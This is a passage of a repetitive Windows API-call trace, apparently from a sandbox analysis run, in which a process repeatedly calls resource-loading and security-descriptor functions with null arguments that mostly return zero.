GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.119] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.119] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.119] FreeResource (hResData=0x0) returned 0 [0220.119] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.119] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.119] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.120] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.120] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.120] FreeResource (hResData=0x0) returned 0 [0220.120] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.120] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.120] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.121] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.121] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.121] FreeResource (hResData=0x0) returned 0 [0220.121] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.121] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.121] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.122] LockResource (hResData=0x0) returned 0x0 [0220.122] FreeResource (hResData=0x0) returned 0 [0220.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.123] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.123] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.123] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.123] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.123] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.123] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.123] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.123] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.123] LockResource (hResData=0x0) returned 0x0 [0220.123] FreeResource (hResData=0x0) returned 0 [0220.123] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.124] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.124] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.124] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.124] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.124] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.124] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.124] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.124] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.124] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.124] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.124] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.124] LockResource (hResData=0x0) returned 0x0 [0220.124] FreeResource (hResData=0x0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.125] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.125] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.125] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.125] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.125] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.125] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.125] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.125] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.125] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.125] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.125] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.125] LockResource (hResData=0x0) returned 0x0 [0220.125] FreeResource (hResData=0x0) returned 0 [0220.126] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.126] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.126] LockResource (hResData=0x0) returned 0x0 [0220.126] FreeResource (hResData=0x0) returned 0 [0220.126] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.126] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.126] IsNLSDefinedString (Function=0x0, 